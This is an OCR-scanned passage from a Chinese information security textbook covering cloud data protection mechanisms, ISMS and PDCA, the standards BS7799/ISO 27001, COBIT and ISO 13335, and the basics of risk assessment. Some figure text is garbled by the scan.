破 , 但 由 于 效率 问题 ,距离 实际 应 用 很 还 远 。 如 果 数 据 在 计算 时 解密 以 明文 形式 驻 留 在 内 
存 中 , 则 机 密 性 和 完整 性 的 保护 需要 依赖 其 他 的 安全 机 制 。 因 此 ,一 些 基于 策略 模型 的 安 
全 机 制 常 用 来 保护 云 服务 中 的 动态 数据 : 

(1) 隔离 机 制 。 一 种 思路 就 是 采用 沙 箱 机 制 对 云 应 用 进行 隔离 。CyberGuarder 是 
一 个 虚拟 化 安全 保护 框架 ,在 操作 系统 用 户 隔离 方面 , 它 采 用 了 Linux 自 带 的 chroot 命 
令 创 建 一 个 独立 的 软件 系统 的 虚拟 复制 。chroot 命令 可 更 改 根 路 径 到 新 的 指定 路 径 , 由 
超级 用 户 执行 此 命令 ,经 过 chroot 后 ,在 新 的 根 目录 下 .将 访问 不 到 旧 系 统 的 根 目录 结构 
和 文件 。 

(2) 访问 控制 模型 和 机 制 。 访 问 控制 仍然 是 云 计算 系统 中 的 基本 安全 机 制 之 一 , 通 
过 访问 权限 管理 来 实现 系统 中 数据 和 资源 的 保护 ,防止 用 户 进行 非 授权 的 访问 。 但 是 , 云 
计算 系统 具有 高 度 的 开放 性 ,动态 性 和 异 构 性 ,对 数据 进行 保护 时 要 考虑 不 同 的 参与 者 、 
安全 策略 和 使 用 模式 等 ,这 些 特点 对 传统 的 访问 控制 模型 ,如 强制 访问 控制 (MAC)、 自 主 
访问 控制 (DAC) 和 基于 角色 的 访问 控制 (RBAC) 提 出 了 新 的 挑战 。 

在 SaaS 应 用 中 ,最 常用 的 访问 控制 模型 是 RBAC 模型 ,为 了 解决 传统 模型 在 开放 、 
动态 环境 中 的 缺陷 ,研究 者 进行 了 改进 和 发 展 。 由 于 不 同 云 租户 安全 策略 的 差异 性 ,为 所 
有 租户 建立 统一 的 访问 控制 模型 显然 不 合理 。 大 多 数 的 方案 是 按 租户 进行 信任 域 的 划 
分 ,再 解决 跨 域 的 访问 控制 问题 。 在 云 计算 中 ,用 户 和 服务 商 各 方 既 要 提供 必需 的 资源 以 
完成 用 户 的 任务 ,又 需要 保证 他 们 提供 的 资源 不 被 对 方 非法 利用 ,上 述 的 场景 需要 更 细 粒 
度 的 访问 控制 策略 ,但 在 访问 控制 模型 中 ,一 般 对 权限 的 设置 是 允许 或 禁止 , 细 粒 度 的 访 
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问 控制 策略 会 大 大 提高 模型 的 复杂 度 。 

(3) 基于 信息 流 模型 的 数据 安全 保护 机 制 。 信 息 流 控制 (Information Flow Control， 
IFC) 通 过 追踪 系统 中 的 数据 蔓延 过 程 ,允许 不 可 信 的 代码 对 机 密 数 据 进行 访问 ,并 阻止 
代码 将 机 密 数 据 传播 给 非 授权 的 主体 。IFC 比 访问 控制 机 制 更 便于 实现 细 粒 度 的 数据 保 
护 ,为 了 将 IFC 模型 用 于 动态 .协作 的 分 布 式 计算 系统 中 ,Mayer 等 在 2000 年 提出 了 分 布 
式 信息 流 控制 (Decentralized Information Flow Control,DIFC) ,对 主体 ,标记 ,安全 策略 、 
标记 传递 规则 分 别 进行 描述 ,并 建立 它们 之 间 的 内 在 联系 。DIFC 具有 两 个 突出 特点 : 安 
全 策略 由 用 户 自主 制定 ,不 需要 CA 集中 授权 ,这 一 特点 使 其 适用 于 用 户 数量 多 ,用 户 安 
全 需求 复杂 的 云 计算 系统 ;虽然 是 分 散 授权 ,但 能 够 明确 策略 的 执行 点 ,策略 执行 是 由 可 
信 的 小 部 分 代码 实现 , 易 被 监控 。 


11.5 本 章 小 结 


本 章 主要 从 数据 备份 与 恢复 、 云 计算 安全 两 个 角度 介绍 数据 安全 的 相关 知识 。 在 数 
据 备 份 与 恢复 方面 ,重点 介绍 数据 备份 类 型 和 数据 灾 备 技术 ;在 云 计算 安全 方面 ,首先 介 
绍 云 计算 相关 概念 及 体系 结构 ,然后 分 别 从 云 数据 存储 和 云 数 据 管理 角度 介绍 云 数据 存 
储 管理 相关 技术 ;最 后 介绍 当前 云 计 算 面临 的 安全 威胁 ,以 及 常用 的 安全 保护 技术 。 
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1. 简 述 什么 是 数据 备份 ” 为 什么 需要 数据 备份 ” 它 与 数据 复制 有 什么 不 同 ? 

2. 数据 备份 技术 有 哪 几 种 分 类 方式 ,每 种 分 类 方式 是 如 何 进行 划分 的 ,各 有 什么 优 
缺点 ? 

3. 请 简 述 完全 备份 . 增 量 备份 .差分 备份 这 三 种 备份 策略 的 思路 。 并 说 明 三 种 备份 
方式 有 哪些 不 同 ? 各 自 又 有 哪些 优 缺 点 ? 

4. 什么 是 数据 容 灾 ? 当前 主要 的 数据 容 灾 技术 有 哪些 ? 

5. 什么 是 云 计算 ? 云 计 算 有 哪些 主要 的 特点 ? 

6. 什么 是 公有 云 .私有 云 .混合 云 ? 

7. 请 说 明 云 计算 体系 结构 中 的 SaaS、PaaS、IaaS 的 含义 ,主要 有 什么 功能 ? 

8. 当前 的 云 存储 和 管理 技术 有 哪些 ? 请 简 述 其 主要 思想 。 

9. 请 简 述 云 计 算 安全 面临 的 安全 威胁 。 

10. 当前 解决 云 计算 安全 有 哪些 技术 ? 
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本 章 学 习 要 点 : 

计 息 安全 风险 评估 流程 ; 

安全 管理 标准 ; 

如 了 解 信 息 安全 审计 的 基本 内 容 和 过 程 。 


12.1 信息 安全 管理 体系 


在 互市 中 小 企业 服务 平台 案例 中 ,信息 安全 事件 除了 前 面 介绍 的 信息 安全 技术 因素 
引起 的 以 外 , 另 一 方面 是 因 管理 不 当 而 导致 的 。 据 有 关 统 计 , 信 息 安 全 事件 中 大 约 有 
70% 以 上 的 问题 都 是 由 于 管理 方面 的 原因 造成 的 , 即 对 应 于 人 们 常 说 的 “三 分 技术 ,七 分 
管理 "。 因 此 , 仅 靠 信息 安全 技术 并 不 能 实现 信息 安全 的 持续 性 ,只 有 树立 信息 安全 意识 ， 
完善 信息 安全 组 织 , 健 全 信息 安全 制度 ,建立 体系 化 的 流程 化 的 信息 安全 管理 机 制 ,规范 
信息 安全 行为 才能 建立 信息 安全 长 久 机 制 。 

根据 木 桶 原理 ,信息 系统 安全 水 平 将 由 与 信息 安全 有 关 的 所 有 环节 中 最 薄弱 的 环节 
所 决定 ,因此 要 实现 良好 的 信息 安全 ,需要 信息 安全 技术 和 信息 安全 管理 有 效 地 配合 。 具 
体 而 言 ,在 信息 安全 技术 方面 ,需要 建设 安全 的 主机 系统 和 安全 的 网 络 系统 ,包括 实现 物 
理 层 安全 、 系 统 层 安全 、 网 络 层 安全 和 应 用 层 安全 等 ,并 配备 一 定 的 安全 产品 ,如 数据 加 密 
产品 、 数 据 存 储备 份 产品 、 系 统 容错 产品 、 防 病毒 产品 ,安全 网 关 产 品 等 。 在 信息 安全 管理 
层面 , 则 需要 构建 信息 安全 管理 体系 。 

本 节 将 介绍 信息 安全 管理 体系 的 相关 概念 ,构建 方法 和 过 程 及 信息 安全 管理 标准 。 
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目前 ,信息 安全 管理 (Information Security Management) 的 概念 没有 统一 的 定义 。 一 般 
而 言 , 信 息 安全 管理 是 指 组 织 为 了 实现 信息 安全 目标 和 信息 资产 保护 ,用 来 指导 和 管理 各 种 
控制 信息 安全 风险 的 ,一 组 相互 协调 的 活动 。 要 实现 组 织 中 信息 的 安全 性 、 高 效 性 和 动态 性 
管理 ,就 需要 依据 信息 安全 管理 模型 和 信息 安全 管理 标准 构建 信息 安全 管理 体系 。 

信息 安全 管理 体系 (Information Security Management System,ISMS) 是 指 组 织 以 信 
息 安全 风险 评估 为 基础 的 系统 化 \ 程 序 化 和 文件 化 的 管理 体系 ,包括 建立 .实施 、 运 行 、 监 
视 、 评 审 、 保 持 和 改进 信息 安全 等 一 系列 的 管理 活动 。 管 理 体系 通常 包括 组 织 结 构 .方针 
策略 、 规 划 活 动 职责、 实践 程序、 过程 和 资源 。 由 此 可 见 ,ISMS 的 建立 是 基于 组 织 ,立足 
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于 信息 安全 风险 评估 ,体现 以 预防 为 主 的 思想 ,并 且 是 全 过 程 和 动态 控制 。 一 般 而 言 ， 
ISMS 具有 如 下 的 功能 : 

(1) 强化 员工 的 信息 安全 意识 ,规范 组 织 的 信息 安全 行为 。 

(2) 对 组 织 的 关键 信息 资产 进行 全 面 系统 的 保护 ,维持 竞争 优势 。 

(3) 在 信息 系统 受到 侵袭 时 ,确保 业务 持续 开展 并 将 损失 降 到 最 低 程 度 。 

(4) 使 组 织 的 生意 伙伴 和 客户 对 组 织 充满 信心 。 

(5) 使 组 织 定期 地 考虑 新 的 威胁 和 脆弱 点 ,并 对 系统 进行 更 新 和 控制 。 

(6) 促使 管理 层 坚 持 贯 彻 信息 安全 保障 体系 。 
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BS7799 是 国际 公认 的 ISMS 标准 ,其 第 二 部 分 BS7799-2《 信 息 安 全 管理 体系 规范 ) 中 
详细 说 明了 建立 ,实施 和 维护 信息 安全 管理 体系 的 要 求 。 一 个 组 织 必须 识别 和 管理 众多 
活动 使 之 有 效 运 作 。 通 过 使 用 资源 和 管理 ,将 输入 转化 为 输出 的 任意 活动 ,可 以 视 为 一 个 
过 程 。 通 常 ,一 个 过 程 的 输出 可 直接 构成 下 一 个 过 程 的 输入 。 一 个 组 织 内 各 个 过 程 系统 
的 运用 ,连同 这 些 过 程 的 识别 和 相互 作用 及 管理 , 称 为 “过程 方法 ”。 

2002 年 ,BS7799-2 的 修订 版 本 BS7799-2: 2002 中 引入 了 PDCA (Plan-Do-Check- 
Action) 过 程 方 法 ,用 于 建立 、 实 施 和 持续 改进 ISMS。PDCA 循环 又 称 “ 戴 明 环 ”, 由 美国 
质量 管理 专家 Edwards Deming 博士 在 20 世纪 50 年 代 提出 ,是 全 面 质 量 管理 所 应 遵循 
的 科学 程序 。PDCA 强调 应 将 业务 过 程 看 作 连 续 的 反馈 循环 ,在 反馈 循环 的 过 程 中 识别 
需要 改进 的 部 分 ,以 使 过 程 得 到 持续 的 改进 ,质量 得 到 螺旋 式 上 升 。BS7799-2: 2002 标 
准 在 建立 .实施 和 改进 组 织 ISMS 的 过 程 方法 中 采用 了 PDCA 循环 的 思想 ,具体 如 图 12-1 
所 示 。 


规划 
Plan 
PP 
ISMS 小 
es 处 置 lf 持 实施 和 ”| 实施 
相关 方 Act A 运行 ISMS | Do 相关 方 
~\ 
信息 安全 要 求 上 “| 受 控 的 信息 
和 期 望 | / 安全 
i i 
1 i 


图 12-1 应 用 于 ISMS 过 程 的 PDCA 模型 


应 用 于 ISMS 过 程 的 PDCA 模型 在 每 个 阶段 的 具体 内 容 如 下 : 
(1) 规划 Plan( 建 立 ISMS)。 在 这 个 阶段 ,主要 完成 ISMS 的 构建 工作 ,主要 包括 : 
定义 ISMS 的 范围 和 方针 ,制定 风险 评估 的 系统 性 方法 ,识别 风险 ,应 用 组 织 确定 的 系统 
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性 方法 评估 风险 ,识别 并 评估 可 选 的 风险 处 理 方式 ,选择 控制 目标 与 控制 方式 , 当 决定 接 
受 剩 余 风险 时 应 获得 管理 者 同意 ,并 获得 管理 者 授权 ,以 及 拟定 一 份 适用 性 声明 。 

(2) 实施 Do( 实 施 和 运行 ISMS) 。 实 施 阶 段 主要 任务 是 实施 和 运行 ISMS 方针 、 控 
制 措施 .过 程 和 程序 ,包括 : 实施 特定 的 管理 程序 ,实施 所 选择 的 控制 ,运作 管理 ,实施 能 
够 促进 安全 事件 检测 和 响应 的 程序 和 其 他 控制 。 

(3) 检查 Check( 监 视 和 评审 ISMS)。 检 查 阶段 的 主要 任务 是 进行 有 关 方 针 、 标 准 、 
法 律 法 规 与 程序 的 符合 性 检查 ,包括 : ISMS 的 执行 程序 及 其 他 控制 措施 是 否 得 以 认真 贯 
彻 ,ISMS 有 效 性 的 定期 评审 ,度量 控制 措施 的 有 效 性 以 验证 安全 要 求 是 否 被 满足 ,按照 
计划 的 时 间 间 隔 进行 风险 评估 的 评审 等 。 

(4) 处 置 Act( 保 持 和 改进 ISMS)。 处 置 阶段 主要 对 ISMS 进行 评价 ,寻求 改进 的 机 
会 ,采取 相应 的 措施 ,包括 : 测量 ISMS 绩效 ,识别 ISMS 的 改进 措施 ,并 有 效 实施 ,采取 适 
当 的 纠正 和 预防 措施 ,与 涉及 的 所 有 相关 方 磋商 、 沟 通 结果 及 其 措施 ,必要 时 修改 ISMS， 
确保 修改 达到 既定 的 目标 。 
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本 节 主 要 介绍 ISMS 构建 过 程 ,ISMS 框架 的 搭建 是 按照 适当 的 流程 进行 的 ,如 图 12-2 
所 示 。 


安全 方针 和 策略 
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图 12-2 ISMS 框架 建立 流程 


1. 定义 信息 安全 方针 和 策略 
信息 安全 方针 是 组 织 信息 安全 的 最 高 方针 ,需要 根据 组 织 内 各 个 部 门 的 实际 情况 ,分 
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别 制定 不 同 的 信息 安全 方针 。 信 息 安 全 方针 的 制定 应 遵循 简洁 明了 通俗 易 懂 的 原则 ,并 
形成 书面 文档 ,发 给 组 织 内 的 所 有 成 员 。 为 了 加 强 组 织 内 相关 成 员 对 方针 的 理解 ,更 好 地 
应 用 于 实际 工作 中 ,需要 对 组 织 内 的 相关 成 员 进 行 信息 安全 方针 培训 。 

此 外 ,除了 总 的 信息 安全 方针 外 ,还 需要 制定 具体 的 信息 安全 策略 ,明确 规定 具体 的 
信息 安全 实施 规则 ,用 来 保证 控制 措施 的 有 效 执行 。 

2. 定义 ISMS 的 范围 

组 织 需要 根据 自身 的 特性 ,如 地 理 位 置 . 资 产 和 技术 等 ,对 ISMS 的 范围 进行 界定 。 
在 本 阶段 ,应 将 组 织 划 分 为 不 同 的 信息 安全 控制 领域 ,以 易于 对 不 同 需求 的 领域 进行 适当 
的 信息 安全 管理 。 

3. 进行 信息 安全 风险 评估 

信息 安全 风险 评估 的 复杂 程度 将 取决 于 风险 的 复杂 程度 和 受 保护 资产 的 敏感 程度 。 
组 织 需要 选择 一 个 适合 其 安全 要 求 的 风险 评估 和 管理 方案 ,然后 进行 合乎 规范 的 评估 , 识 
别 当前 面临 的 风险 及 风险 等 级 。 信 息 安全 风险 评估 的 对 象 是 组 织 的 信息 资产 ,评估 内 容 
主要 包括 对 信息 资产 面临 的 各 种 威胁 和 脆弱 点 进行 评估 ,同时 对 已 存在 的 安全 措施 进行 
鉴定 。 更 多 内 容 将 在 下 节 中 详细 介绍 。 

4. 信息 安全 风险 管理 

根据 信息 安全 风险 评估 结果 和 结论 进行 相应 的 风险 管理 ,将 信息 安全 风险 水 平 降 至 
可 接受 的 范围 。 当 前 主要 措施 有 : 降低 风险 .避免 风险 .转移 风险 和 接受 风险 。 降 低 风 险 
是 在 考虑 转移 风险 之 前 ,首先 考虑 要 采取 的 措施 ;对 于 有 些 风险 ,可 采用 一 定 的 技术 措施 
或 更 改 操作 流程 实现 风险 避免 ; 若 某 些 风险 不 能 被 降低 或 避免 ,在 被 转嫁 风险 方 接受 的 情 
二 可 进行 转移 风险 的 操作 ;对 于 那些 在 采取 了 降低 风险 和 避免 风险 的 措施 后 ,出 于 实 

和 经 济 方面 的 原因 ,只 要 组 织 进行 运营 ,就 必然 存在 并 必须 接受 的 风险 。 

5. 确定 控制 目标 和 选择 控制 措施 

控制 目标 的 确定 和 控制 措施 的 选择 的 原则 是 费用 不 能 超过 风险 所 造成 的 损失 。 由 于 
信息 安全 是 一 个 动态 的 系统 工程 ,组 织 应 实时 对 选择 的 控制 目标 和 控制 措施 加 以 校 验 和 
调整 ,以 适应 变化 了 的 情况 ,使 组 织 的 信息 资产 得 到 有 效 、 经 济 、 合 理 的 保护 。 

6. 准备 信息 安全 适用 性 声明 

信息 安全 适用 性 声明 记录 了 组 织 内 相关 的 风险 控制 目标 和 针对 每 种 风险 所 采取 的 各 
种 控制 措施 。 主 要 的 作用 包括 : 向 组 织 内 的 成 员 声 明 面 对 信 息 安 全 风险 的 态度 ;向 组 织 
外 的 人 员 表明 组 织 的 态度 和 作为 ,表明 组 织 已 经 全 面 . 系 统 地 审视 了 组 织 的 信息 安全 系 
统 , 并 将 所 有 应 该 得 到 控制 的 风险 控制 在 能 够 被 接受 的 范围 内 。 
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信息 安全 管理 标准 对 ISMS 的 建设 具有 重要 的 指导 意义 ,本 节 介 绍 当 前 信息 安全 管 
理 相关 的 技术 标准 。 

1. BS7799 

BS7799 是 由 英国 BSI/DISC (British Standards Institute/Delivering Information 
Solutions to Customers) 的 BDD/2 信息 安全 管理 委员 会 指导 下 完成 的 ,是 当前 国际 公认 
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的 信息 安全 实施 标准 。 该 标准 旨 在 为 一 个 组 织 提供 用 来 制定 安全 标准 、 实 施 有 效 安全 管 
理 的 通用 要 素 , 并 不 涉及 “怎么 做 ”的 细节 , 它 是 制定 一 个 机 构 自 己 标准 的 出 发 点 ,因此 适 
用 于 各 种 产业 和 组 织 , 其 演进 发 展 过 程 可 见 图 12-3 所 示 。 


次 必 洒 [| ISO/EC 17799: 2000 | ,| ISO/EC 17799: 2005| ,| ISONEC 27002: 2005 | | ISO/EC 27002: 2013 

1999 年 重新 发 布 | 2000 年 发 布 下 2005 年 发 布 | 2007 年 发 布 | 2013 年 发 布 
2 BS 7799-2: 2002 ISOIEC 27001: 2005| | ISO/EC 27001: 2013 

1998 年 首次 发 布 “上 = 2: 瞩 Ez 和 人 区 

1 全 全 和 六 中。 2002 年 发 布 ”三 和 ”2005 年 发 布 “” 厂 ”2013 年 发 布 


图 12-3 ”BS7799 演进 发 展 过 程 


1993 年 ,BS7799 标准 由 英国 贸易 工业 部 立项 ;1995 年 ,英国 首次 出 版 BS7799-1: 
1995《 信 息 安 全 管理 实施 细则 》;1998 年 ,BS7799-2: 1998《 信 息 安全 管理 体系 规范 ) 公 布 ; 
1999 年 ,BS7799-1: 1995 和 BS7799-2: 1998 被 重新 修订 ,并 发 布 了 BS7799-1: 1999 和 
BS7799-2: 1999, 其 中 BS7779-1: 1999 对 如 何 建立 并 实施 符合 BS7799-2: 1999 标准 要 求 
的 ISMS 提供 了 最 佳 的 应 用 建议 ;2000 年 ,BS7799-1: 1999《 信 息 安全 管理 实施 细则 ) 通 过 
了 国际 标准 化 组 织 ISO 认证 ,正式 成 为 国际 标准 ISO/IEC17799-1: 2000《 信 息 技术 -信息 
安全 管理 实施 规则 》;2002 年 ,BS7799-2: 1999 被 重新 修订 ,并 发 布 了 替代 版 本 BS7799-2; 
2002; 2005 年 , ISO/IEC17799-1: 2000 改版 ,发 展 成 为 ISO/IEC17799: 2005 标准 ， 
BS7799-2: 2002 也 被 ISO 正式 采用 ,命令 为 ISO/IEC 27001: 2005; 2007 年 ,为 了 和 
27000 系列 保持 统一 ,ISO 组 织 将 ISOVIEC17799: 2005 正式 更 改编 号 为 ISO/IEC27002: 
2005; 时 隔 8 年 后 ,ISO/IEC27002: 2005 和 ISO/IEC 27001: 2005 被 重新 修订 ,于 2013 
年 10 月 正式 发 布 了 替代 版 本 ISO/IEC27002: 2013《 信 息 技 术 -安全 技术 -信息 安全 控制 实 
用 规则 》(Information technology-Security techniques-Code of practice for information 
security controls) 和 ISO/IEC 27001: 2013《 信 息 技术 -安全 技术 -信息 安全 管理 体系 -要 
求 》(Information technology-Security techniques-Information security management 
systems-Requirements) 。 

可 见 ,BS7799 发 展 后 分 为 两 部 分 ,这 里 仍然 以 ISO/VIEC27002: 2005 和 ISOVIEC 
27001: 2005 为 例 进行 介绍 。ISO/IEC27002: 2005 标准 包含 有 11 项 管理 内 容 ,133 条 安 
全 控制 措施 。 在 2013 年 新 发 布 的 版 本 ISO/IEC27002: 2013 中 ,管理 内 容 被 调整 为 14 
项 ,控制 措施 减少 到 113 条 。ISO/IEC27002: 2005 的 安全 管理 体系 如 图 12-4 所 示 。 

ISO/IEC 27001: 2005《 信 息 安 全 管理 体系 规范 ) 主 要 讨论 了 以 PDCA 过 程 方法 建设 
ISMS 以 及 ISMS 评估 的 内 容 , 具 体内 容 已 在 前 面 进 行 了 介绍 。 该 标准 详细 地 说 明了 建 
立 、 实 施 、 监 视 和 维护 ISMS 的 具体 任务 和 要 求 , 指 出 实施 机 构 应 该 遵循 的 风险 评估 标准 。 
作为 一 套 标准 ,ISO/IEC 27001: 2005 给 出 了 组 织 如 何 通过 ISO/IEC27002: 2005 来 建立 
满足 安全 需求 的 ISMS 的 方法 。 到 目前 为 止 ,已 知 的 正式 认可 的 ISMS 认证 方案 是 根据 
ISO/IEC 27001: 2005 实施 的 ,而 不 是 根据 ISO/IEC27002: 2005。 

2. 信息 和 相关 技术 控制 目标 

信息 和 相关 技术 控制 目标 (Control Objective for Information and related 
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安全 策略 (Security Policy) 


信息 安全 组 织 (Organization of Information Security) 


资产 管理 (Asset Management) 


人 力 资源 安全 ”| 物理 和 环境 安全 | 通信 和 操作 管理 | 信息 系统 获取 、 
(Human Resource (Physical and (Communications 开发 和 维护 
Security) Environmental and Operations (Information 
Security) Management) Systems 
Acquisition, 
Development and 
访问 控制 (Access Control) Maintenance) 


信息 安全 事件 管理 (Information Security Incident Management) 


业务 连续 性 管理 (Business Continuity Management) 


符合 性 (Compliance) 


图 12-4 ”ISO/IEC 27002:2005 安全 管理 体系 


Technology,COBIT) 是 目前 国际 上 通用 的 安全 与 信息 技术 管理 和 控制 标准 。 它 在 业务 
风险 ,控制 需要 和 技术 问题 之 间架 起 了 一 座 桥梁 ,可 以 辅助 管理 层 进行 IT 治理 ,指导 组 
织 有 效 利用 信息 资源 ,有 效 地 管理 与 信息 相关 的 风险 。COBIT 共 分 为 4 个 域 ,34 个 高 级 
控制 目标 和 318 个 详细 控制 目标 ,其 中 4 个 域 为 : 规划 与 组 织 (Planning & Organization， 
PO) .获取 与 实施 (Acquisition & Implementation, AI)、 交 付 与 支持 (Delivery and 
Support,DS) ,监视 与 评价 (Monitor & Evaluate,ME) 。 通 过 这 4 个 域 , 对 IT 资源 进行 管 
理 , 实 现 IT 的 控制 目标 ,具体 如 图 12-5 所 示 。 

3. ISO/IEC13335 

ISO/IEC13335 是 国际 标准 《IT 安全 管理 指南 》(Guidelines for the Management of 
IT Security,GMITS) ,该 标准 由 5 部 分 组 成 : ISO/IEC13335-1: 1996《IT 安全 的 概念 与 
模型 )、.ISO/IEC13335-2; 1997《IT 安全 管理 与 规划 》、ISO/IEC13335-3:1998《IT 安全 管 
理 技术 》ISO/VIEC13335-4: 2000《 防 护 措施 的 选择 》、ISO/IEC13335-5: 2001《 网 络 安全 管 
理 指南 );。 其 中 ISO/IEC13335-1: 1996《1IT 安全 的 概念 与 模型 》 已 经 被 新 的 ISO/IEC 
13335-1: 2004《( 信 息 和 通信 技术 安全 管理 的 概念 和 模型 所 取代 。 

4. GB17895—1999 

1999 年 ,由 我 国 公安 部 主持 制定 .国家 质量 技术 监督 局 发 布 的 中 华人 民 共和 国 国 家 
标准 GB17895 一 1999《 计 算 机 信息 系统 安全 保护 等 级 划分 准则 》 正 式 颁布 ,与 2001 年 1 月 
1 日 起 施行 。 该 标准 将 计算 机 信息 系统 安全 保护 等 级 划分 为 5 个 级 别 : 用 户 自主 保护 级 、 
系统 审计 保护 级 安全 标记 保护 级 、 结 构 化 保护 级 和 访问 验证 保护 级 。 这 5 个 级 别 的 划分 
准则 如 图 12-6 所 示 。 
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MEI IT 业绩 监控 与 评价 
ME2 内 部 控制 监控 与 评价 
ME3 确保 符合 外 部 要 求 
ME4 提供 IT 治理 


自主 访问 控制 
第 一 级 自主 安全 保护 身份 鉴别 
完整 性 保护 


图 12-5 COBIT 框架 


PO1 定义 IT 战略 规划 

PO2 定义 信息 系统 结构 

PO3 确定 技术 方向 

PO4 定义 IT 流程 、 组 织 和 关系 
PO5 管理 IT 投资 

PO6 沟通 管理 目标 和 方向 


PO9 IT 风险 评估 及 管理 
PO10 项 目 管理 


All 确定 系统 的 解决 方案 

AI2 系统 使 用 与 维护 

Al3 技术 基础 设施 的 获取 与 维护 
Al4 运营 知识 保障 

AI5 获取 IT 资源 

Al6 变更 管理 

AI7 系统 测试 与 发 


自主 访问 控制 
第 二 级 审计 安全 保护 ) 身份 枚 人 
完整 性 保护 
要 自主 访问 控制 系统 审计 强制 访问 控制 
第 三 级 强制 安全 保护 】 诅 份 量 | | i 
完整 性 保护 
自主 访问 控制 系统 审计 强制 访问 控制 
第 四 要 结构 化 保护 身份 监 客体 重 有 标记 
完整 性 保护 ” ”| [条 策 通道 分 夺 可 人 路径 
自主 访问 控制 强制 访问 控制 
第 五 级 访问 验证 保护 级 身份 鉴别 标记 
完整 性 保护 | 可 信 路 径 


可 信人 恢复 


图 12-6 信息 系统 安全 等 级 保护 划分 原则 
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12.2 信息 安全 风险 评估 


信息 安全 风险 评估 是 信息 安全 管理 的 基础 ,也 是 信息 安全 管理 的 核心 内 容 。 本 节 主 
要 介绍 信息 安全 风险 评估 的 相关 概念 、 组 成 要 素 ,评估 流 程 、 评 估 方 法 以 及 评估 工具 。 


1221 信息 安全 风险 评估 概念 


风险 (Risk) 是 指 一 定 条件 下 和 一 定时 期 内 可 能 发 生 的 不 利 事件 发 生 的 可 能 性 。 既 强 
调 风 险 发 生 的 不 确定 性 ,又 强调 风险 损失 的 不 确定 性 。 目 前 ,信息 安全 风险 没有 统一 的 定 
义 。 在 澳大利亚 /新 西 兰 国家 标准 AS/NZS4360 中 ,信息 安全 风险 指 对 目标 产生 影响 的 
某 种 事件 发 生 的 可 能 性 ,可 以 用 后 果 和 可 能 性 来 衡量 。 在 ISO/IEC13335-1 中 ,信息 安全 
风险 是 指 某 个 给 定 的 威胁 利用 单个 或 一 组 资产 的 脆弱 点 造成 资产 受 损 的 潜在 可 能 性 。 在 
我 国 GB/T20984 一 2013《 信 息 安全 风险 评估 规范 ) 中 ,信息 安全 风险 是 指 人 为 或 自然 的 威 
胁 利 用 信息 系统 及 其 管理 体系 中 存在 的 脆弱 点 导致 安全 事件 的 发 生 及 其 对 组 织造 成 的 
影响 。 

一 般 而 言 ,信息 安全 风险 可 表现 为 威胁 CThreats)、 脆 弱点 (Vulnerabilities) 和 资产 
(Assert) 之 间 的 相互 作用 , 即 

风险 = 威胁 十 脆弱 点 十 资产 

其 中 风险 会 随 着 任 一 因素 的 增加 而 增 大 ,减少 而 减少 。 

根据 GB/T20984 一 2013《 信 息 安 全 风险 评估 规范 》, 信 息 安全 风险 评估 是 指 依 据 有 关 
信息 安全 技术 与 管理 标准 ,对 信息 系统 及 由 其 处 理 、 传 输 和 存储 的 信息 的 保密 性 、 完 整 性 
和 可 用 性 等 安全 属性 进行 评价 的 过 程 。 它 要 评估 资产 面临 的 威胁 以 及 威胁 利用 脆弱 点 导 
致 安全 事件 的 可 能 性 ,并 结合 安全 事件 所 涉及 的 资产 价值 来 判断 安全 事件 一 旦 发 生 对 组 
织造 成 的 影响 。 

信息 安全 风险 评估 对 信息 安全 保障 体系 建设 具有 重要 的 促进 作用 ,能 有 效 帮 助 组 织 
制定 决策 策略 。 没 有 有 效 和 及 时 的 信息 安全 风险 评估 ,将 使 得 各 个 组 织 无 法 对 其 信息 安 
全 的 状况 做 出 准确 的 判断 。 因 为 任何 信息 系统 都 会 有 安全 风险 ,信息 安全 建设 的 宗旨 
一 ,就 是 在 综合 考虑 成 本 和 效益 的 前 提 下 ,通过 安全 措施 来 控制 风险 ,使 残余 风险 降 至 用 
户 可 控 范围 内 。 


1222 信息 安全 风险 评估 组 成 要 素 


在 CC 标准 .ISO13335 标准 和 我 国 的 GB/T20984 一 2007《 信 息 安全 风险 评估 规范 ) 标 
准 中 都 有 对 信息 安全 风险 的 构成 要 素 及 相关 关系 进行 描述 。 本 节 以 这 3 个 标准 为 基础 ， 
介绍 信息 安全 风险 评估 组 成 要 素 及 其 相关 关系 。 

1. CC 标准 

1993 年 ,美国 ,加拿大 与 欧洲 四 国 组 成 六 国 七 方 ,共同 制定 了 国际 通用 的 评估 准则 
CC(Common Criteria) ,其 目的 是 建立 一 个 各 国都 能 接受 的 通用 的 信息 安全 产品 和 系统 
的 安全 性 评价 标准 。 在 1996 年 颁布 了 CC1. 0 版 ,1998 年 颁布 了 CC2.0 版 ,1999 年 ,ISO 
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接纳 CC2.0 版 为 ISO/IEC 15408 草案 ,并 命名 为 信息 技术 -安全 技术 -IT 安全 性 评估 准 
则 ,并 于 同年 正式 发 布 国际 标准 ISO/IEC15408 CC2.1 版 。 

CC 标准 主要 由 三 部 分 构成 : 简介 和 一 般 模型 .安全 功能 要 求 和 安全 保障 要 求 。 在 简 
介 和 一 般 模型 中 ,定义 了 信息 安全 风险 构成 要 素 威胁 、 风 险 、 脆 弱点 ,资产 ,对策 等 关键 风 
险要 素 的 概念 ,同时 又 提出 了 所 有 者 和 威胁 主体 的 概念 ,如 图 12-7 所 示 。 


价值 
所 有 者 
希望 最 小 化 
和 
减少 
可 能 具有 
可 能 被 减少 1 
一 一 一 一 ~ 胞 习性 
利用 
导致 
威胁 主体 风险 
引起 增加 | 到 ! 
威胁 | 资产 
希望 滥用 或 破坏 i 


图 12-7 CC 标准 中 风险 要 素 之 间 的 关系 


风险 要 素 之 间 的 关系 可 概括 为 如 下 过 程 : 

(1) 信息 资产 的 所 有 者 给 资产 赋予 了 一 定 的 价值 ,威胁 主体 希望 滥用 或 破坏 资产 , 因 
而 引发 威胁 利用 脆弱 点 ,导致 风险 的 产生 。 

(2) 资产 所 有 者 意识 到 脆弱 点 的 存在 和 脆弱 点 被 利用 而 导致 的 风险 ,因而 希望 通过 
对 策 来 降低 风险 ,使 风险 最 小 化 。 

(3) 脆弱 点 可 能 被 对 策 减 少 , 但 是 同时 对 策 本 身 可 能 具有 其 他 的 脆弱 点 。 

2. ISO13335 标准 和 GB/T20984 一 2007 标准 

ISO/IEC13335 是 信息 安全 管理 方面 的 指导 性 标准 ,其 中 ISO/IEC13335-1 以 风险 为 
中 心 , 确 定 了 资产 威胁 、 脆 弱点 、 影 响 、 风 险 、 防 护 措施 为 信息 安全 风险 的 要 素 , 并 描述 了 
